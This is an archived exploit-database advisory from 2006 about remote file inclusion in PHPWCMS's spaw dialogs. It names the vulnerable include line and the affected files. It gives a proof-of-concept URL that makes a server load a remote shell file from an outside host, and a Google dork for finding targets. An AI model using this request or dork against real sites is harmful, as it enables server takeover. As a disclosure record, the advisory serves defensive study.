PHPWCMS 1.1-RC4 - 'spaw' Remote File Inclusion

Author: Morgan
type: webapps
platform: php
port: 80.0
date_added: 2006-08-09  
date_updated: 2016-09-01  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comphpwcms_1.1-RC4_2004-05-01.tar.gz  

raw file: 2163.txt  
PhpwCMS 1.2.6 <= Multiple Remote file inclusion vulnerabilities

Discovered by :

|\/| _ ._ _  _.._
|  |(_)| (_|(_|| |
          _|



Vuln In :
include $spaw_root.'class/lang.class.php';

Affected Files :
include/inc_ext/spaw/dialogs/table.php
include/inc_ext/spaw/dialogs/a.php
include/inc_ext/spaw/dialogs/colorpicker.php
include/inc_ext/spaw/dialogs/confirm.php
include/inc_ext/spaw/dialogs/img.php
include/inc_ext/spaw/dialogs/img_library.php
include/inc_ext/spaw/dialogs/td.php

Vendor Website: http://www.phpwcms.de/

PoC:
http://server/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ehmorgan.net/shell.dat?

Google Dork:

inurl:"phpwcms/index.php?id="

Visit us :

www.ehmorgan.net
irc.gigachat.net
#Morgan

# milw0rm.com [2006-08-10]